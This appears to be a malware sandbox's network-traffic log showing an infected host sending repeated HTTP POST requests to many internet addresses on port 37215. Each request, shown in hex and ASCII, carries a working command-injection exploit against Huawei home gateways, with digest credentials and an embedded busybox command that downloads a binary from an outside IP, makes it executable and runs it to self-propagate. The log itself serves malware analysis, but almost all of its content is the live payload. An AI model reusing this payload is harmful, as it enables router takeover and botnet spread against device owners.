2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2444192.168.2.134770041.191.15.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631179094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2445192.168.2.134397441.44.167.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631179094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2446192.168.2.134635639.123.172.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631213903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2447192.168.2.134298841.75.84.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631280899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2448192.168.2.1358562216.36.30.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631287098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2449192.168.2.1351974163.28.35.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631321907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2450192.168.2.1345504157.45.152.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631367922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2451192.168.2.1353156209.151.154.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631378889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2452192.168.2.133764841.225.8.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631658077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2453192.168.2.1341010197.43.130.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631712914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2454192.168.2.134628841.85.23.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631769896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
